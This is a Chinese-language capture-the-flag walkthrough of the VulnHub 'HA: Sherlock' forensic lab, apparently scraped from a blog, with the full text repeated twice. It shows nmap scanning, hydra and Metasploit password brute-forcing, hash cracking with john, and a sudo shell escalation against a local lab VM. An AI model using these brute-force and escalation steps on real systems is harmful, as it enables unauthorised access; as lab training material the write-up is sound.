HA: SHERLOCK 靶机渗透取证
HA: SHERLOCK 靶機滲透取證
靶機描述:
DescriptionHA: Sherlock! This lab is based on the famous investigator’s journey on solving the Curious Case of Harshit's murder!This is a Forensic based Capture-the-Flag and is not a Boot-to-RootSo, put on your thinking caps and get ready to solve the case by finding the evidences bearing points. There is a total of 100 points scattered over the labObjective: Find all 100 points (Getting Root is not the objective)Disclaimer: This machine works on VMWare. There might be IP related issues with Virtual Box.
靶機下載鏈接:https://www.vulnhub.com/entry/ha-sherlock,580/
環境部署
靶機:使用 VMware 打開上述網址下載的 ova 靶機文件
使用機:VMware 下的 Kali-Linux-2021.2-vmware-amd64、win10
(使用機與靶機在同一網絡環境內)
主機發現
網絡掃描
因為靶機與使用機在同一網絡環境下,使用 kali 自帶工具進行掃描發現靶機 ip、MAC 地址
netdiscover
端口掃描
使用 nmap 的 -A 參數進行綜合掃描
nmap -A 192.168.8.106
發現其開放的端口及服務:
21-ftp 22-ssh 25-stmp
80-http 110-pop3 143-imap
993-ssl/imap 995-ssl/pop3
獲得100分
0 + 15 pionts
(根據端口進行接入)
訪問 80 端口查看信息
可以發現靶機的來龍去脈
查看源碼
發現底部有段注釋,隱藏了信息:
尋找 .mp4 文件
因為上邊提到了兩個名字,根據上邊的 .mp4 提示訪問 http://192.168.8.106/irene.mp4
發現是一只迷之生物打哈欠,未發現其他信息
嘗試連接 22-ssh
連接發現提示信息和莫斯電碼:
莫斯電碼解密
使用在線或者其他工具進行莫斯電碼解密得到明文:BASKERVILLE
下載 mp4 文件,使用 OurSecret 進行解密
根據上一步驟提示:BASKERVILLE 和 mp4 視頻有關,訪問剛才頁面,下載視頻;下載 OurSecret 解密軟件解密
(OurSecret 是在 Windows 環境下安裝的)
解密后得到 15_Points.txt 文件
15 + 10 points
pop3s 密碼爆破
根據 http 網頁上的名字:harshit 結合開啟了 pip3s
我們嘗試使用 hydra(九頭蛇)工具進行爆破,字典使用 Kali 自帶的 rockyou.txt,得到 harshit 密碼 superman
hydra -l harshit -P /usr/share/wordlists/rockyou.txt 192.168.8.106 pop3s
登陸郵箱查看信息
使用上一步中獲得的賬密登陸郵箱:
openssl s_client -crlf -connect 192.168.8.106:110 -starttls pop3
user harshit
pass superman
retr 1 #查看第一封郵件
retr 2 #查看第二封
retr 3 #查看第三封
[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-6kk1JuM9-1634523042441)(https://p3.ssl.qhimg.com/t01e05a1b783f2e4416.png)]
翻譯就是這樣子:
可以看到,是恐嚇郵件,提取其中關鍵詞:
“May 27, 2020 11:02:09 AM”
epoch(語義奇怪)
看到了時間一般就會和時間戳有關系
時間戳轉換
一、可以以 epoch time 為關鍵詞在網上搜一下就能找到工具
填寫相關信息得到時間戳:
二、UTC時間轉換
做好信息收集的同學可以發現,該靶機的制作組人位于英國,英國的時間為 UTC+00:00
目錄查看
以時間戳構造路徑并訪問: http://192.168.8.106/1590577329/ 發現 10_Points.txt 和 名為 john 的內存鏡像
25 + 10 points
內存取證
使用 volatility 進行取證
1.提取內存鏡像信息
python2 ./vol.py -f ~/Downloads/john.mem imageinfo 2.查看運行進程
python2 ./vol.py -f ~/Downloads/john.mem --profile=WinXPSP2x86 pslist
發現 notepad(記事本)進程
3.查看 notepad 內容
python2 ./vol.py -f ~/Downloads/john.mem --profile=WinXPSP2x86 notepad
發現 Thcgpune 嘗試 ROT13 解密(就硬解,要不就構造密碼本將常用加密都試一遍進行爆破)
ROT13:Guptchar
嘗試連接 ftp
根據內存鏡像名和上述 ROT13 明文嘗試連接 ftp 服務
ftp 192.168.8.107 #這里因為網絡原因靶機ip從106變成了107(個人情況)
john
Guptchar
ls
發現文件夾,cd 進入發現兩個文件,分別是 10_Points.txt、mycroft.001
cd files
ls
使用 get 獲取文件:
get 10_Points.txt
get mycroft.001
Ctrl+z #返回原kali shell
cat ./10_Points.txt
35 + 10 points
使用 autopsy 分析磁盤鏡像
上一步我們發現了 mycroft.001 文件,001后綴一般是大文件分割成部分以 001、002、···,為后綴的小文件(常在分卷壓縮中出現)。
這里可以把它當成不完整的磁盤鏡像
使用 kali 自帶工具 autopsy 進行分析磁盤鏡像:
#該工具是網頁交互工具
autopsy
訪問 http://localhost:9999/autopsy 使用工具
創建新案例:
命名及其他信息:
添加鏡像:add image -> add image file
這里的文件路徑寫你們的文件路徑,因為文件不是完整的磁盤鏡像因此選擇 partition
加載文件:ANALYZE -> FILE ANALYSIS
在 Important 目錄中發現 10_Points.txt、hint.jpg、mycroft.png
45 + 15 points
分析圖片
查看上一步驟的 mycroft.png:
發現是一大串 16 進制代碼,發現應該是地址,顏色花花綠綠的應該和顏色有關,其中有標紅的轉 16 進制為 22 應該代表 22 ssh 端口,綠色十六進制轉字符串為 Khufiya(Khufiya在印地語中的意思是機密)可能是密碼
嘗試 ssh 連接
與之前一樣,使用文件名作為用戶名,Khufiya 為密碼嘗試登陸 ssh:
ssh mycroft@192.168.8.107
Khufiya
ls
cat 15_Points.txt
在該用戶目錄下發現 15_Points.txt、jim.wav
進行信息收集得到該機用戶名如下:
60 + 15 points
scp 下載 jim.wav
scp mycroft@192.168.8.107:./jim.wav ./
分析 jim.wav
使用 audacity 分析 jim.wav 文件,查看頻譜發現出現 deep sound 字樣
使用 john 破解 hash
使用 john 自帶 deepsound 腳本提取 hash 表進行爆破
/usr/share/john/deepsound2john.py jim.wav > hash #john腳本提取hash表
john --wordlist=/usr/share/wordlists/rockyou.txt hash #密碼本破解hash
john hash --show #查看文件歷史john解密結果(john相同文件第二次解密不顯示,需使用該命令查看)
得到密碼:poohbear(狗熊)
使用 deep sound 解密
將文件拖入 -> 使用密碼解密 -> 提取文件 -> 打開文件所在目錄
得到 15_Points.txt、creds.txt 再拿下 15 分
75 + 25 points
base64 解密
查看上一步的 creds.txt 文件,是一個 PGP 消息中間寫入了一句 base64
解密 base64 得到明文:Bhediya
ssh 爆破
用 mycroft 用戶登錄時獲得的用戶名構造列表,用上一步解密結果作為密碼,使用 msf 進行爆破登入:
msfconsole
use auxiliary/scanner/ssh/ssh_login #使用ssh login模塊
set rhosts 192.168.8.107
set user_file ./user_file.txt #設置用戶名表
set password Bhediya #設置密碼
run
sessions 1
python3 -c "import pty;pty.spawn('/bin/bash')" #切換交互式shell
sudo -l #查看以sudo權限執行的命令(這里顯示是所有命令都可以執行)
Bhediya #輸入當前用戶密碼
sudo /bin/bash #以sudo權限開新shell
cd /root/
ls
HA: SHERLOCK 靶機滲透取證
靶機描述:
DescriptionHA: Sherlock! This lab is based on the famous investigator’s journey on solving the Curious Case of Harshit's murder!This is a Forensic based Capture-the-Flag and is not a Boot-to-RootSo, put on your thinking caps and get ready to solve the case by finding the evidences bearing points. There is a total of 100 points scattered over the labObjective: Find all 100 points (Getting Root is not the objective)Disclaimer: This machine works on VMWare. There might be IP related issues with Virtual Box.
靶機下載鏈接:https://www.vulnhub.com/entry/ha-sherlock,580/
環境部署
靶機:使用 VMware 打開上述網址下載的 ova 靶機文件
使用機:VMware 下的 Kali-Linux-2021.2-vmware-amd64、win10
(使用機與靶機在同一網絡環境內)
主機發現
網絡掃描
因為靶機與使用機在同一網絡環境下,使用 kali 自帶工具進行掃描發現靶機 ip、MAC 地址
netdiscover
端口掃描
使用 nmap 的 -A 參數進行綜合掃描
nmap -A 192.168.8.106
發現其開放的端口及服務:
21-ftp 22-ssh 25-stmp
80-http 110-pop3 143-imap
993-ssl/imap 995-ssl/pop3
獲得100分
0 + 15 pionts
(根據端口進行接入)
訪問 80 端口查看信息
可以發現靶機的來龍去脈
查看源碼
發現底部有段注釋,隱藏了信息:
尋找 .mp4 文件
因為上邊提到了兩個名字,根據上邊的 .mp4 提示訪問 http://192.168.8.106/irene.mp4
發現是一只迷之生物打哈欠,未發現其他信息
嘗試連接 22-ssh
連接發現提示信息和莫斯電碼:
莫斯電碼解密
使用在線或者其他工具進行莫斯電碼解密得到明文:BASKERVILLE
下載 mp4 文件,使用 OurSecret 進行解密
根據上一步驟提示:BASKERVILLE 和 mp4 視頻有關,訪問剛才頁面,下載視頻;下載 OurSecret 解密軟件解密
(OurSecret 是在 Windows 環境下安裝的)
解密后得到 15_Points.txt 文件
15 + 10 points
pop3s 密碼爆破
根據 http 網頁上的名字:harshit 結合開啟了 pip3s
我們嘗試使用 hydra(九頭蛇)工具進行爆破,字典使用 Kali 自帶的 rockyou.txt,得到 harshit 密碼 superman
hydra -l harshit -P /usr/share/wordlists/rockyou.txt 192.168.8.106 pop3s
登陸郵箱查看信息
使用上一步中獲得的賬密登陸郵箱:
openssl s_client -crlf -connect 192.168.8.106:110 -starttls pop3
user harshit
pass superman
retr 1 #查看第一封郵件
retr 2 #查看第二封
retr 3 #查看第三封
翻譯就是這樣子:
可以看到,是恐嚇郵件,提取其中關鍵詞:
“May 27, 2020 11:02:09 AM”
epoch(語義奇怪)
看到了時間一般就會和時間戳有關系
時間戳轉換
一、可以以 epoch time 為關鍵詞在網上搜一下就能找到工具
填寫相關信息得到時間戳:
二、UTC時間轉換
做好信息收集的同學可以發現,該靶機的制作組人位于英國,英國的時間為 UTC+00:00
目錄查看
以時間戳構造路徑并訪問: http://192.168.8.106/1590577329/ 發現 10_Points.txt 和 名為 john 的內存鏡像
25 + 10 points
內存取證
使用 volatility 進行取證
1.提取內存鏡像信息
python2 ./vol.py -f ~/Downloads/john.mem imageinfo 2.查看運行進程
python2 ./vol.py -f ~/Downloads/john.mem --profile=WinXPSP2x86 pslist
發現 notepad(記事本)進程
3.查看 notepad 內容
python2 ./vol.py -f ~/Downloads/john.mem --profile=WinXPSP2x86 notepad
發現 Thcgpune 嘗試 ROT13 解密(就硬解,要不就構造密碼本將常用加密都試一遍進行爆破)
ROT13:Guptchar
嘗試連接 ftp
根據內存鏡像名和上述 ROT13 明文嘗試連接 ftp 服務
ftp 192.168.8.107 #這里因為網絡原因靶機ip從106變成了107(個人情況)
john
Guptchar
ls
發現文件夾,cd 進入發現兩個文件,分別是 10_Points.txt、mycroft.001
cd files
ls
使用 get 獲取文件:
get 10_Points.txt
get mycroft.001
Ctrl+z #返回原kali shell
cat ./10_Points.txt
35 + 10 points
使用 autopsy 分析磁盤鏡像
上一步我們發現了 mycroft.001 文件,001后綴一般是大文件分割成部分以 001、002、···,為后綴的小文件(常在分卷壓縮中出現)。
這里可以把它當成不完整的磁盤鏡像
使用 kali 自帶工具 autopsy 進行分析磁盤鏡像:
#該工具是網頁交互工具
autopsy
[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-BTbofqB1-1634523043756)(https://p1.ssl.qhimg.com/t01d7b38c5543cd19e7.png)]
訪問 http://localhost:9999/autopsy 使用工具
創建新案例:
命名及其他信息:
添加鏡像:add image -> add image file
這里的文件路徑寫你們的文件路徑,因為文件不是完整的磁盤鏡像因此選擇 partition
加載文件:ANALYZE -> FILE ANALYSIS
在 Important 目錄中發現 10_Points.txt、hint.jpg、mycroft.png
45 + 15 points
分析圖片
查看上一步驟的 mycroft.png:
發現是一大串 16 進制代碼,發現應該是地址,顏色花花綠綠的應該和顏色有關,其中有標紅的轉 16 進制為 22 應該代表 22 ssh 端口,綠色十六進制轉字符串為 Khufiya(Khufiya在印地語中的意思是機密)可能是密碼
嘗試 ssh 連接
與之前一樣,使用文件名作為用戶名,Khufiya 為密碼嘗試登陸 ssh:
ssh mycroft@192.168.8.107
Khufiya
ls
cat 15_Points.txt
在該用戶目錄下發現 15_Points.txt、jim.wav
進行信息收集得到該機用戶名如下:
60 + 15 points
scp 下載 jim.wav
scp mycroft@192.168.8.107:./jim.wav ./
分析 jim.wav
使用 audacity 分析 jim.wav 文件,查看頻譜發現出現 deep sound 字樣
[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-uROOQHjr-1634523043770)(https://p3.ssl.qhimg.com/t01995e613ac91bb485.png)]
使用 john 破解 hash
使用 john 自帶 deepsound 腳本提取 hash 表進行爆破
/usr/share/john/deepsound2john.py jim.wav > hash #john腳本提取hash表
john --wordlist=/usr/share/wordlists/rockyou.txt hash #密碼本破解hash
john hash --show #查看文件歷史john解密結果(john相同文件第二次解密不顯示,需使用該命令查看)
得到密碼:poohbear(狗熊)
使用 deep sound 解密
將文件拖入 -> 使用密碼解密 -> 提取文件 -> 打開文件所在目錄
得到 15_Points.txt、creds.txt 再拿下 15 分
75 + 25 points
base64 解密
查看上一步的 creds.txt 文件,是一個 PGP 消息中間寫入了一句 base64
解密 base64 得到明文:Bhediya
ssh 爆破
用 mycroft 用戶登錄時獲得的用戶名構造列表,用上一步解密結果作為密碼,使用 msf 進行爆破登入:
msfconsole
use auxiliary/scanner/ssh/ssh_login #使用ssh login模塊
set rhosts 192.168.8.107
set user_file ./user_file.txt #設置用戶名表
set password Bhediya #設置密碼
run
sessions 1
python3 -c "import pty;pty.spawn('/bin/bash')" #切換交互式shell
sudo -l #查看以sudo權限執行的命令(這里顯示是所有命令都可以執行)
Bhediya #輸入當前用戶密碼
sudo /bin/bash #以sudo權限開新shell
cd /root/
ls
總結
以上是生活随笔為你收集整理的HA: SHERLOCK 靶机渗透取证的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: kali安装vscode和无法启动解决方
- 下一篇: with上下文管理